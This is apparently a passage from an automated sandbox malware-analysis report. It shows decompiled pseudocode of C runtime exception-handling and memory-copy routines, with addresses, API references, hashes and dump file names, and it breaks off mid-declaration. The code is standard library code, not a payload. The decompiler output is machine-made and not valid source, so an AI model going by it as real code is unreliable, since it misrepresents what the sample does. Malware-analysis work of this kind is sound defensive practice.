				unsigned int _t179;
				int _t180;
				int _t191;
				intOrPtr* _t195;
				intOrPtr _t196;
				signed int _t200;
				char _t202;
				int _t206;
				unsigned int _t207;
				int _t208;
				int _t210;
				int _t215;
				signed int _t226;
				unsigned int _t230;
				int _t231;
				int _t233;
				signed int _t239;
				void* _t240;
				intOrPtr _t241;
				void* _t243;
				signed int _t251;
				intOrPtr _t258;
				void* _t260;
				void* _t263;
				void* _t264;
				void* _t265;
				intOrPtr* _t267;
				int _t271;
				void* _t275;
				void* _t277;
				void* _t287;

				_t221 = __edx;
				_t195 = _a4;
				_push(_t240);
				_v5 = 0;
				_v16 = 1;
				 *_t195 = E00EB06BB(__ecx,  *_t195);
				_t196 = _a8;
				_t6 = _t196 + 0x10; // 0x11
				_t258 = _t6;
				_push(_t258);
				_v20 = _t258;
				_v12 =  *(_t196 + 8) ^  *0xeb9008;
				E00EA5530(_t196, __edx, _t240, _t258,  *(_t196 + 8) ^  *0xeb9008);
				E00EA6C3C(_a12);
				_t150 = _a4;
				_t277 = _t275 - 0x1c + 0x10;
				_t241 =  *((intOrPtr*)(_t196 + 0xc));
				if(( *(_t150 + 4) & 0x00000066) != 0) {
					__eflags = _t241 - 0xfffffffe;
					if(_t241 != 0xfffffffe) {
						_t221 = 0xfffffffe;
						E00EA6DC0(_t196, 0xfffffffe, _t258, 0xeb9008);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t150;
					_v28 = _a12;
					 *((intOrPtr*)(_t196 - 4)) =  &_v32;
					if(_t241 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t200 = _v12;
							_t157 = _t241 + (_t241 + 2) * 2;
							_t196 =  *((intOrPtr*)(_t200 + _t157 * 4));
							_t158 = _t200 + _t157 * 4;
							_t201 =  *((intOrPtr*)(_t158 + 4));
							_v24 = _t158;
							if( *((intOrPtr*)(_t158 + 4)) == 0) {
								_t202 = _v5;
								goto L7;
							} else {
								_t221 = _t258;
								_t159 = E00EA6D60(_t201, _t258);
								_t202 = 1;
								_v5 = 1;
								_t287 = _t159;
								if(_t287 < 0) {
									_v16 = 0;
									L13:
									_push(_t258);
									E00EA5530(_t196, _t221, _t241, _t258, _v12);
									goto L14;
								} else {
									if(_t287 > 0) {
										_t160 = _a4;
										__eflags =  *_t160 - 0xe06d7363;
										if( *_t160 == 0xe06d7363) {
											__eflags =  *0xeb13e4;
											if(__eflags != 0) {
												_t191 = E00EB00C0(__eflags, "jS�");
												_t277 = _t277 + 4;
												__eflags = _t191;
												if(_t191 != 0) {
													_t271 =  *0xeb13e4; // 0xea536a
													 *0xeb1278(_a4, 1);
													 *_t271();
													_t258 = _v20;
													_t277 = _t277 + 8;
												}
												_t160 = _a4;
											}
										}
										_t222 = _t160;
										E00EA6DA0(_t160, _a8, _t160);
										_t162 = _a8;
										__eflags =  *((intOrPtr*)(_t162 + 0xc)) - _t241;
										if( *((intOrPtr*)(_t162 + 0xc)) != _t241) {
											_t222 = _t241;
											E00EA6DC0(_t162, _t241, _t258, 0xeb9008);
											_t162 = _a8;
										}
										_push(_t258);
										 *((intOrPtr*)(_t162 + 0xc)) = _t196;
										E00EA5530(_t196, _t222, _t241, _t258, _v12);
										E00EA6D80();
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t241);
										_push(_t258);
										_t260 = _v36;
										_t206 = _v32;
										_t243 = _v40;
										_t165 = _t260 + _t206;
										__eflags = _t243 - _t260;
										if(_t243 <= _t260) {
											L25:
											__eflags = _t206 - 0x20;
											if(_t206 < 0x20) {
												L96:
												_t207 = _t206 & 0x0000001f;
												__eflags = _t207;
												if(_t207 != 0) {
													_t167 = _t207;
													_t208 = _t207 >> 2;
													__eflags = _t208;
													while(_t208 != 0) {
														 *_t243 =  *_t260;
														_t243 = _t243 + 4;
														_t260 = _t260 + 4;
														_t208 = _t208 - 1;
														__eflags = _t208;
													}
													_t210 = _t167 & 0x00000003;
													__eflags = _t210;
													while(_t210 != 0) {
														 *_t243 =  *_t260;
														_t260 = _t260 + 1;
														_t243 = _t243 + 1;
														_t210 = _t210 - 1;
														__eflags = _t210;
													}
												}
												goto L102;
											} else {
												__eflags = _t206 - 0x80;
												if(__eflags >= 0) {
													asm("bt dword [0xfe2728], 0x1");
													if(__eflags >= 0) {
														__eflags = (_t243 ^ _t260) & 0x0000000f;
														if(__eflags != 0) {
															L33:
															asm("bt dword [0xfe2728], 0x0");
															if(__eflags >= 0) {
																goto L58;
															} else {
																__eflags = _t243 & 0x00000003;
																if((_t243 & 0x00000003) != 0) {
																	goto L58;
																} else {
																	__eflags = _t260 & 0x00000003;
																	if(__eflags == 0) {
																		asm("bt edi, 0x2");
																		if(__eflags < 0) {
																			_t176 =  *_t260;
																			_t206 = _t206 - 4;
																			__eflags = _t206;
																			_t260 = _t260 + 4;
																			 *_t243 = _t176;
																			_t243 = _t243 + 4;
																		}
																		asm("bt edi, 0x3");
																		if(__eflags < 0) {
																			asm("movq xmm1, [esi]");
																			_t206 = _t206 - 8;
																			__eflags = _t206;
																			_t260 = _t260 + 8;
																			asm("movq [edi], xmm1");
																			_t243 = _t243 + 8;
																		}
																		__eflags = _t260 & 0x00000007;
																		if(__eflags == 0) {
																			asm("movdqa xmm1, [esi-0x8]");
																			_t263 = _t260 - 8;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t263 = _t263 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0x8");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0x8");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0x8");
																				asm("movdqa [edi+0x20], xmm5");
																				_t243 = _t243 + 0x30;
																			} while (_t206 >= 0x30);
																			_t260 = _t263 + 8;
																		} else {
																			asm("bt esi, 0x3");
																			if(__eflags >= 0) {
																				asm("movdqa xmm1, [esi-0x4]");
																				_t264 = _t260 - 4;
																				do {
																					asm("movdqa xmm3, [esi+0x10]");
																					_t206 = _t206 - 0x30;
																					asm("movdqa xmm0, [esi+0x20]");
																					asm("movdqa xmm5, [esi+0x30]");
																					_t264 = _t264 + 0x30;
																					__eflags = _t206 - 0x30;
																					asm("movdqa xmm2, xmm3");
																					asm("palignr xmm3, xmm1, 0x4");
																					asm("movdqa [edi], xmm3");
																					asm("movdqa xmm4, xmm0");
																					asm("palignr xmm0, xmm2, 0x4");
																					asm("movdqa [edi+0x10], xmm0");
																					asm("movdqa xmm1, xmm5");
																					asm("palignr xmm5, xmm4, 0x4");
																					asm("movdqa [edi+0x20], xmm5");
																					_t243 = _t243 + 0x30;
																				} while (_t206 >= 0x30);
																				_t260 = _t264 + 4;
																				while(1) {
																					L51:
																					__eflags = _t206 - 0x10;
																					if(__eflags < 0) {
																						break;
																					}
																					asm("movdqu xmm1, [esi]");
																					_t206 = _t206 - 0x10;
																					_t260 = _t260 + 0x10;
																					asm("movdqa [edi], xmm1");
																					_t243 = _t243 + 0x10;
																				}
																				asm("bt ecx, 0x2");
																				if(__eflags < 0) {
																					_t175 =  *_t260;
																					_t206 = _t206 - 4;
																					__eflags = _t206;
																					_t260 = _t260 + 4;
																					 *_t243 = _t175;
																					_t243 = _t243 + 4;
																				}
																				asm("bt ecx, 0x3");
																				if(__eflags < 0) {
																					asm("movq xmm1, [esi]");
																					__eflags = _t206;
																					_t260 = _t260 + 8;
																					asm("movq [edi], xmm1");
																					_t243 = _t243 + 8;
																				}
																				goto __eax;
																			}
																			asm("movdqa xmm1, [esi-0xc]");
																			_t265 = _t260 - 0xc;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t265 = _t265 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0xc");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0xc");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0xc");
																				asm("movdqa [edi+0x20], xmm5");
																				_t243 = _t243 + 0x30;
																			} while (_t206 >= 0x30);
																			_t260 = _t265 + 0xc;
																		}
																		goto L51;
																	}
																}
															}
															goto L60;
														} else {
															asm("bt dword [0xeb9010], 0x1");
															if(__eflags < 0) {
																_t178 = _t260 & 0x0000000f;
																__eflags = _t178;
																if(_t178 != 0) {
																	_push(_t206 - 0x10);
																	_t179 = 0x10 - _t178;
																	_t215 = _t179 & 0x00000003;
																	__eflags = _t215;
																	while(_t215 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 1;
																		_t243 = _t243 + 1;
																		_t215 = _t215 - 1;
																		__eflags = _t215;
																	}
																	_t180 = _t179 >> 2;
																	__eflags = _t180;
																	while(_t180 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 4;
																		_t243 = _t243 + 4;
																		_t180 = _t180 - 1;
																		__eflags = _t180;
																	}
																	_pop(_t206);
																}
																_t230 = _t206;
																_t206 = _t206 & 0x0000007f;
																_t231 = _t230 >> 7;
																__eflags = _t231;
																while(_t231 != 0) {
																	asm("movdqa xmm0, [esi]");
																	asm("movdqa xmm1, [esi+0x10]");
																	asm("movdqa xmm2, [esi+0x20]");
																	asm("movdqa xmm3, [esi+0x30]");
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm1");
																	asm("movdqa [edi+0x20], xmm2");
																	asm("movdqa [edi+0x30], xmm3");
																	asm("movdqa xmm4, [esi+0x40]");
																	asm("movdqa xmm5, [esi+0x50]");
																	asm("movdqa xmm6, [esi+0x60]");
																	asm("movdqa xmm7, [esi+0x70]");
																	asm("movdqa [edi+0x40], xmm4");
																	asm("movdqa [edi+0x50], xmm5");
																	asm("movdqa [edi+0x60], xmm6");
																	asm("movdqa [edi+0x70], xmm7");
																	_t260 = _t260 + 0x80;
																	_t243 = _t243 + 0x80;
																	_t231 = _t231 - 1;
																	__eflags = _t231;
																}
																goto L92;
															} else {
																goto L33;
															}
														}
													} else {
														memcpy(_t243, _t260, _t206);
														return _v40;
													}
												} else {
													asm("bt dword [0xeb9010], 0x1");
													if(__eflags < 0) {
														L92:
														__eflags = _t206;
														if(_t206 != 0) {
															_t233 = _t206 >> 5;
															__eflags = _t233;
															if(_t233 != 0) {
																do {
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t260 = _t260 + 0x20;
																	_t243 = _t243 + 0x20;
																	_t233 = _t233 - 1;
																	__eflags = _t233;
																} while (_t233 != 0);
															}
															goto L96;
														}
														L102:
														return _v40;
													} else {
														L58:
														__eflags = _t243 & 0x00000003;
														while((_t243 & 0x00000003) != 0) {
															 *_t243 =  *_t260;
															_t206 = _t206 - 1;
															_t260 = _t260 + 1;
															_t243 = _t243 + 1;
															__eflags = _t243 & 0x00000003;
														}
														L60:
														_t226 = _t206;
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L96;
														} else {
															memcpy(_t243, _t260, _t206 >> 2 << 2);
															switch( *((intOrPtr*)((_t226 & 0x00000003) * 4 +  &M00EA5934))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *__edi =  *__esi;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	 *__edi =  *__esi;
																	_t92 = __esi + 1; // 0xc0330cc4
																	 *((char*)(__edi + 1)) =  *_t92;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *__edi =  *__esi;
																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											}
										} else {
											__eflags = _t243 - _t165;
											if(_t243 < _t165) {
												_t267 = _t260 + _t206;
												_t251 = _t243 + _t206;
												__eflags = _t206 - 0x20;
												if(__eflags < 0) {
													L83:
													__eflags = _t206 & 0xfffffffc;
													while((_t206 & 0xfffffffc) != 0) {
														_t251 = _t251 - 4;
														_t267 = _t267 - 4;
														 *_t251 =  *_t267;
														_t206 = _t206 - 4;
														__eflags = _t206 & 0xfffffffc;
													}
													__eflags = _t206;
													if(_t206 != 0) {
														do {
															_t251 = _t251 - 1;
															_t267 = _t267 - 1;
															 *_t251 =  *_t267;
															_t206 = _t206 - 1;
															__eflags = _t206;
														} while (_t206 != 0);
													}
													return _v40;
												} else {
													asm("bt dword [0xeb9010], 0x1");
													if(__eflags < 0) {
														__eflags = _t251 & 0x0000000f;
														if((_t251 & 0x0000000f) != 0) {
															do {
																_t206 = _t206 - 1;
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																 *_t251 =  *_t267;
																__eflags = _t251 & 0x0000000f;
															} while ((_t251 & 0x0000000f) != 0);
															while(1) {
																L79:
																__eflags = _t206 - 0x80;
																if(_t206 < 0x80) {
																	break;
																}
																_t267 = _t267 - 0x80;
																_t251 = _t251 - 0x80;
																asm("movdqu xmm0, [esi]");
																asm("movdqu xmm1, [esi+0x10]");
																asm("movdqu xmm2, [esi+0x20]");
																asm("movdqu xmm3, [esi+0x30]");
																asm("movdqu xmm4, [esi+0x40]");
																asm("movdqu xmm5, [esi+0x50]");
																asm("movdqu xmm6, [esi+0x60]");
																asm("movdqu xmm7, [esi+0x70]");
																asm("movdqu [edi], xmm0");
																asm("movdqu [edi+0x10], xmm1");
																asm("movdqu [edi+0x20], xmm2");
																asm("movdqu [edi+0x30], xmm3");
																asm("movdqu [edi+0x40], xmm4");
																asm("movdqu [edi+0x50], xmm5");
																asm("movdqu [edi+0x60], xmm6");
																asm("movdqu [edi+0x70], xmm7");
																_t206 = _t206 - 0x80;
																__eflags = _t206 & 0xffffff80;
																if((_t206 & 0xffffff80) != 0) {
																	continue;
																}
																break;
															}
															__eflags = _t206 - 0x20;
															if(_t206 >= 0x20) {
																do {
																	_t267 = _t267 - 0x20;
																	_t251 = _t251 - 0x20;
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t206 = _t206 - 0x20;
																	__eflags = _t206 & 0xffffffe0;
																} while ((_t206 & 0xffffffe0) != 0);
															}
															goto L83;
														}
														goto L79;
													} else {
														__eflags = _t251 & 0x00000003;
														if((_t251 & 0x00000003) != 0) {
															_t239 = _t251 & 0x00000003;
															_t206 = _t206 - _t239;
															__eflags = _t206;
															do {
																 *(_t251 - 1) =  *((intOrPtr*)(_t267 - 1));
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																_t239 = _t239 - 1;
																__eflags = _t239;
															} while (_t239 != 0);
														}
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L83;
														} else {
															asm("std");
															memcpy(_t251 - 4, _t267 - 4, _t206 >> 2 << 2);
															asm("cld");
															switch( *((intOrPtr*)((_t206 & 0x00000003) * 4 +  &M00EA59E0))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	_t113 = __esi + 3; // 0x33ebc033
																	 *((char*)(__edi + 3)) =  *_t113;
																	_t115 = __esi + 2; // 0xebc0330c
																	 *((char*)(__edi + 2)) =  *_t115;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											} else {
												goto L25;
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L108;
							L7:
							_t241 = _t196;
						} while (_t196 != 0xfffffffe);
						if(_t202 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L108:
			}

0x00ea5570
0x00ea5577
0x00ea557b
0x00ea557c
0x00ea5582
0x00ea558e
0x00ea5590
0x00ea5596
0x00ea5596
0x00ea559f
0x00ea55a1
0x00ea55a4
0x00ea55a7
0x00ea55af
0x00ea55b4
0x00ea55b7
0x00ea55ba
0x00ea55c1
0x00ea561d
0x00ea5620
0x00ea5628
0x00ea562f
0x00000000
0x00ea562f
0x00000000
0x00ea55c3
0x00ea55c3
0x00ea55c9
0x00ea55cf
0x00ea55d5
0x00ea5640
0x00ea5649
0x00ea55d7
0x00ea55d7
0x00ea55d7
0x00ea55dd
0x00ea55e0
0x00ea55e3
0x00ea55e6
0x00ea55e9
0x00ea55ee
0x00ea5604
0x00000000
0x00ea55f0
0x00ea55f0
0x00ea55f2
0x00ea55f7
0x00ea55f9
0x00ea55fc
0x00ea55fe
0x00ea5614
0x00ea5634
0x00ea5634
0x00ea5638
0x00000000
0x00ea5600
0x00ea5600
0x00ea564a
0x00ea564d
0x00ea5653
0x00ea5655
0x00ea565c
0x00ea5663
0x00ea5668
0x00ea566b
0x00ea566d
0x00ea566f
0x00ea567c
0x00ea5682
0x00ea5684
0x00ea5687
0x00ea5687
0x00ea568a
0x00ea568a
0x00ea565c
0x00ea5690
0x00ea5692
0x00ea5697
0x00ea569a
0x00ea569d
0x00ea56a5
0x00ea56a9
0x00ea56ae
0x00ea56ae
0x00ea56b1
0x00ea56b5
0x00ea56b8
0x00ea56c8
0x00ea56cd
0x00ea56ce
0x00ea56cf
0x00ea56d0
0x00ea56d1
0x00ea56d2
0x00ea56d6
0x00ea56da
0x00ea56e2
0x00ea56e4
0x00ea56e6
0x00ea56f0
0x00ea56f0
0x00ea56f3
0x00ea5bcb
0x00ea5bcb
0x00ea5bcb
0x00ea5bce
0x00ea5bd0
0x00ea5bd2
0x00ea5bd2
0x00ea5bd5
0x00ea5bd9
0x00ea5bdb
0x00ea5bde
0x00ea5be1
0x00ea5be1
0x00ea5be1
0x00ea5be8
0x00ea5be8
0x00ea5beb
0x00ea5bef
0x00ea5bf1
0x00ea5bf2
0x00ea5bf3
0x00ea5bf3
0x00ea5bf3
0x00ea5beb
0x00000000
0x00ea56f9
0x00ea56f9
0x00ea56ff
0x00ea5714
0x00ea571c
0x00ea572b
0x00ea5730
0x00ea5740
0x00ea5740
0x00ea5748
0x00000000
0x00ea574e
0x00ea574e
0x00ea5754
0x00000000
0x00ea575a
0x00ea575a
0x00ea5760
0x00ea5766
0x00ea576a
0x00ea576c
0x00ea576e
0x00ea576e
0x00ea5771
0x00ea5774
0x00ea5776
0x00ea5776
0x00ea5779
0x00ea577d
0x00ea577f
0x00ea5783
0x00ea5783
0x00ea5786
0x00ea5789
0x00ea578d
0x00ea578d
0x00ea5790
0x00ea5796
0x00ea57fd
0x00ea5802
0x00ea5808
0x00ea5808
0x00ea580d
0x00ea5810
0x00ea5815
0x00ea581a
0x00ea581d
0x00ea5820
0x00ea5824
0x00ea582a
0x00ea582e
0x00ea5832
0x00ea5838
0x00ea583d
0x00ea5841
0x00ea5847
0x00ea584c
0x00ea584c
0x00ea5851
0x00ea5798
0x00ea5798
0x00ea579c
0x00ea5856
0x00ea585b
0x00ea5860
0x00ea5860
0x00ea5865
0x00ea5868
0x00ea586d
0x00ea5872
0x00ea5875
0x00ea5878
0x00ea587c
0x00ea5882
0x00ea5886
0x00ea588a
0x00ea5890
0x00ea5895
0x00ea5899
0x00ea589f
0x00ea58a4
0x00ea58a4
0x00ea58a9
0x00ea58ac
0x00ea58ac
0x00ea58ac
0x00ea58af
0x00000000
0x00000000
0x00ea58b1
0x00ea58b5
0x00ea58b8
0x00ea58bb
0x00ea58bf
0x00ea58bf
0x00ea58c4
0x00ea58c8
0x00ea58ca
0x00ea58cc
0x00ea58cc
0x00ea58cf
0x00ea58d2
0x00ea58d4
0x00ea58d4
0x00ea58d7
0x00ea58db
0x00ea58dd
0x00ea58e1
0x00ea58e4
0x00ea58e7
0x00ea58eb
0x00ea58eb
0x00ea58f5
0x00ea58f5
0x00ea57a2
0x00ea57a7
0x00ea57ac
0x00ea57ac
0x00ea57b1
0x00ea57b4
0x00ea57b9
0x00ea57be
0x00ea57c1
0x00ea57c4
0x00ea57c8
0x00ea57ce
0x00ea57d2
0x00ea57d6
0x00ea57dc
0x00ea57e1
0x00ea57e5
0x00ea57eb
0x00ea57f0
0x00ea57f0
0x00ea57f5
0x00ea57f5
0x00000000
0x00ea5796
0x00ea5760
0x00ea5754
0x00000000
0x00ea5732
0x00ea5732
0x00ea573a
0x00ea5b22
0x00ea5b25
0x00ea5b27
0x00ea5c19
0x00ea5c1a
0x00ea5c1e
0x00ea5c1e
0x00ea5c21
0x00ea5c25
0x00ea5c27
0x00ea5c28
0x00ea5c29
0x00ea5c29
0x00ea5c29
0x00ea5c2c
0x00ea5c2c
0x00ea5c2f
0x00ea5c33
0x00ea5c35
0x00ea5c38
0x00ea5c3b
0x00ea5c3b
0x00ea5c3b
0x00ea5c3e
0x00ea5c3e
0x00ea5b2d
0x00ea5b2f
0x00ea5b32
0x00ea5b32
0x00ea5b35
0x00ea5b40
0x00ea5b44
0x00ea5b49
0x00ea5b4e
0x00ea5b53
0x00ea5b57
0x00ea5b5c
0x00ea5b61
0x00ea5b66
0x00ea5b6b
0x00ea5b70
0x00ea5b75
0x00ea5b7a
0x00ea5b7f
0x00ea5b84
0x00ea5b89
0x00ea5b8e
0x00ea5b94
0x00ea5b9a
0x00ea5b9a
0x00ea5b9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea573a
0x00ea571e
0x00ea571e
0x00ea5726
0x00ea5726
0x00ea5701
0x00ea5701
0x00ea5709
0x00ea5b9d
0x00ea5b9d
0x00ea5b9f
0x00ea5ba3
0x00ea5ba6
0x00ea5ba8
0x00ea5bb0
0x00ea5bb0
0x00ea5bb4
0x00ea5bb9
0x00ea5bbd
0x00ea5bc2
0x00ea5bc5
0x00ea5bc8
0x00ea5bc8
0x00ea5bc8
0x00ea5bb0
0x00000000
0x00ea5ba8
0x00ea5c00
0x00ea5c06
0x00ea570f
0x00ea58f7
0x00ea58f7
0x00ea58fd
0x00ea5901
0x00ea5903
0x00ea5904
0x00ea5907
0x00ea590a
0x00ea590a
0x00ea5912
0x00ea5912
0x00ea5914
0x00ea5917
0x00000000
0x00ea591d
0x00ea5920
0x00ea5925
0x00000000
0x00ea594a
0x00000000
0x00000000
0x00ea594e
0x00ea5950
0x00ea5954
0x00ea5955
0x00ea5956
0x00000000
0x00000000
0x00ea595a
0x00ea595c
0x00ea595f
0x00ea5962
0x00ea5966
0x00ea5967
0x00ea5968
0x00000000
0x00000000
0x00ea596e
0x00ea5973
0x00ea5979
0x00ea597c
0x00ea5980
0x00ea5981
0x00ea5982
0x00000000
0x00000000
0x00ea5925
0x00ea5917
0x00ea5709
0x00ea56ff
0x00ea56e8
0x00ea56e8
0x00ea56ea
0x00ea5984
0x00ea5987
0x00ea598a
0x00ea598d
0x00ea5ae4
0x00ea5ae4
0x00ea5aea
0x00ea5aec
0x00ea5aef
0x00ea5af4
0x00ea5af6
0x00ea5af9
0x00ea5af9
0x00ea5b01
0x00ea5b03
0x00ea5b05
0x00ea5b05
0x00ea5b08
0x00ea5b0d
0x00ea5b0f
0x00ea5b0f
0x00ea5b0f
0x00ea5b05
0x00ea5b1a
0x00ea5993
0x00ea5993
0x00ea599b
0x00ea5a35
0x00ea5a3b
0x00ea5a3d
0x00ea5a3d
0x00ea5a3e
0x00ea5a3f
0x00ea5a42
0x00ea5a44
0x00ea5a44
0x00ea5a4c
0x00ea5a4c
0x00ea5a4c
0x00ea5a52
0x00000000
0x00000000
0x00ea5a54
0x00ea5a5a
0x00ea5a60
0x00ea5a64
0x00ea5a69
0x00ea5a6e
0x00ea5a73
0x00ea5a78
0x00ea5a7d
0x00ea5a82
0x00ea5a87
0x00ea5a8b
0x00ea5a90
0x00ea5a95
0x00ea5a9a
0x00ea5a9f
0x00ea5aa4
0x00ea5aa9
0x00ea5aae
0x00ea5ab4
0x00ea5aba
0x00000000
0x00000000
0x00000000
0x00ea5aba
0x00ea5abc
0x00ea5abf
0x00ea5ac1
0x00ea5ac1
0x00ea5ac4
0x00ea5ac7
0x00ea5acb
0x00ea5ad0
0x00ea5ad4
0x00ea5ad9
0x00ea5adc
0x00ea5adc
0x00ea5ac1
0x00000000
0x00ea5abf
0x00000000
0x00ea59a1
0x00ea59a1
0x00ea59a7
0x00ea59ab
0x00ea59ae
0x00ea59ae
0x00ea59b0
0x00ea59b3
0x00ea59b6
0x00ea59b7
0x00ea59b8
0x00ea59b8
0x00ea59b8
0x00ea59b0
0x00ea59bd
0x00ea59c0
0x00000000
0x00ea59c6
0x00ea59d4
0x00ea59d5
0x00ea59d7
0x00ea59d8
0x00000000
0x00ea59f6
0x00000000
0x00000000
0x00ea59fb
0x00ea59fe
0x00ea5a02
0x00ea5a03
0x00ea5a04
0x00000000
0x00000000
0x00ea5a08
0x00ea5a0b
0x00ea5a0e
0x00ea5a11
0x00ea5a14
0x00ea5a18
0x00ea5a19
0x00ea5a1a
0x00000000
0x00000000
0x00ea5a1f
0x00ea5a25
0x00ea5a2b
0x00ea5a2e
0x00ea5a32
0x00ea5a33
0x00ea5a34
0x00000000
0x00000000
0x00ea59d8
0x00ea59c0
0x00ea599b
0x00000000
0x00000000
0x00000000
0x00ea56ea
0x00ea5602
0x00000000
0x00ea5602
0x00ea5600
0x00ea55fe
0x00000000
0x00ea5607
0x00ea5607
0x00ea5609
0x00ea5610
0x00000000
0x00ea5612
0x00000000
0x00ea5610
0x00ea55d5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00EA55A7
___except_validate_context_record.LIBVCRUNTIME ref: 00EA55AF
_ValidateLocalCookies.LIBCMT ref: 00EA5638
__IsNonwritableInCurrentImage.LIBCMT ref: 00EA5663
_ValidateLocalCookies.LIBCMT ref: 00EA56B8

Strings

csm, xrefs: 00EA564D
jS, xrefs: 00EA5655, 00EA565E, 00EA566F
"G, xrefs: 00EA567C

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: "G$csm$jS
API String ID: 1170836740-3336677713
Opcode ID: d9cc0c497c82d7b47a296211cae9fa5c9e5c7644157c0e2107afc4e00ab9d967
Instruction ID: 63797b3021276f2fae98f01537efd8813a9e2a74ddc47518c98d946148e0cc35
Opcode Fuzzy Hash: d9cc0c497c82d7b47a296211cae9fa5c9e5c7644157c0e2107afc4e00ab9d967
Instruction Fuzzy Hash: F341A235A006189FCF10DF68C884ADEBBF5AF8A328F549155E814BF352D731BA15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EA6111 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E00EA6111(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
